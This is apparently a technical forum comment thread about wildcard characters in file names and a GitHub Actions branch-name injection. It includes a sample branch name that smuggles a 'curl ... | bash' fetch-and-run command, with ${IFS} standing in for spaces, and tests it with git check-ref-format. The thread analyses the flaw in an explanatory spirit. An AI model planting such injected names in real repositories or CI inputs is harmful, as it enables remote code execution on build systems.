We had a system that used "*" as a matter of course in (Windows) file names. It was originally from a completely different OS (Pr1mos, of course, which used @ and = as wildcards), so they just ported it and didn't think about the implications ...

The number of programs (backup especially) that tried to glob the filename and then broke spectacularly ...

Cheers,
Wol

Microsoft had a good idea

Posted Dec 10, 2024 11:22 UTC (Tue) by taladar (subscriber, #68407) [Link] (1 responses)

That must have been particularly bad on Windows since Windows programs implement globbing themselves instead of letting a shell do it.

Microsoft had a good idea

Posted Dec 10, 2024 12:40 UTC (Tue) by Wol (subscriber, #4433) [Link]

Made even worse because on Pr1mos dot-extensions were a (new) convention at the time, while on Windows they are (almost) mandatory.

So with most of the * files being extensionless, the globbing really went mad (I think it actually went recursive!), and until we realised and put a bug in against the backup software, it caused us quite a bit of grief. Telling "our" software not to use *'s was not an option ...

Cheers,
Wol

The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight.

Posted Dec 10, 2024 1:19 UTC (Tue) by jthill (subscriber, #56558) [Link] (2 responses)

branchname='<that mess>'
git check-ref-format refs/heads/"$branchname" || { echo 'no, that does not look good' >&2; exit 1; }

The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight.

Posted Dec 10, 2024 7:54 UTC (Tue) by excors (subscriber, #95769) [Link] (1 responses)

I think that's not correct. The only part of <that mess> that check-ref-format objects to is the ":", but that's not actually part of the branch name. The GitHub pull request is displaying "repositoryname:branchname", and the branch name passed into ${{github.ref}} will be "refs/heads/$({curl,...)" which check-ref-format accepts.

(check-ref-format does reject spaces, which is presumably why the branch name uses ${IFS} instead. It also rejects ASCII control characters, '~', '^', '?', '*', '[', '..', '//', '@{', '\', etc, and says "These rules make it easy for shell script based tools to parse reference names, pathname expansion by the shell when a reference name is used unquoted (by mistake), and also avoid ambiguities in certain reference name expressions" [I think it meant to say "*avoid* pathname expansion"?]. But if it's meant to be safe when mistakenly used unquoted, why does it still allow '$'?)
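That's easy to confirm (with the URL in the payload shortened to a stand-in):

git check-ref-format 'refs/heads/$({curl,-sSfL,x}${IFS}|${IFS}bash)' && echo accepted
git check-ref-format 'refs/heads/a:b' || echo rejected   # the ':' is refused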

The sad thing here is, Git's got a builtin check-ref-format command that rejects this on sight.

Posted Dec 10, 2024 9:24 UTC (Tue) by jthill (subscriber, #56558) [Link]

I see you're correct. Yow. That's painful. I've probably made this mistake myself then.

Unless I'm still blindspotting, though: $branchname, once expanded, quoted or not, still won't be expanded again unless it's rescanned; for example, if the expansion is passed to bash -c, rather than the variable being passed in the environment for the invoked bash to expand just the once itself.

